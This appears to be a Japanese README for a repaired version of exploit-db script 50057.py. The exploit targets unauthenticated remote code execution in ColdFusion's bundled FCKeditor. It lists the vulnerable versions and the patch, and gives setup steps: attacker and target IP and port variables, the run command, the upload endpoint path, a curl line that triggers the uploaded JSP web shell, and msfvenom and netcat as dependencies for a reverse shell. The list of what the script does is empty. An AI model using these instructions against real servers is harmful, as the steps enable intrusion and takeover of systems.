
exploitdbで動作しないexploitスクリプト(50057.py)の修正
ColdFusionに同梱されているFCKeditorコンポーネントにおける任意ファイルアップロードを悪用した、認証不要のリモートコード実行。ファイルアップロードエンドポイントはfilenameパラメータでヌルバイトインジェクションを受け付けるため、JSPウェブシェルをアップロードし、サーバーによって直接実行させることができる。
| バージョン | ステータス |
|---|---|
| ColdFusion 8.0 | 脆弱 |
| ColdFusion 8.0.1 | 脆弱 |
| ColdFusion 9.0 | 脆弱* |
| ColdFusion MX 6.x | 脆弱 |
| ColdFusion MX 7.x | 脆弱 |
| ColdFusion 9.0.1+ | 修正済み |
| ColdFusion 10+ | 影響なし |
*ColdFusion 9.0は、FCKeditorコンポーネントが削除または更新されていない場合に脆弱です。
パッチ: Adobe Security Bulletin APSB09-09 (2009年7月)。
スクリプト冒頭の変数を編集します:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
実行:
python3 poc.py
スクリプトは以下を実行します:
数秒以内にシェルが到達しない場合は、手動でトリガーしてください:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
ファイル名はアップロード後に標準出力に表示されます。
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm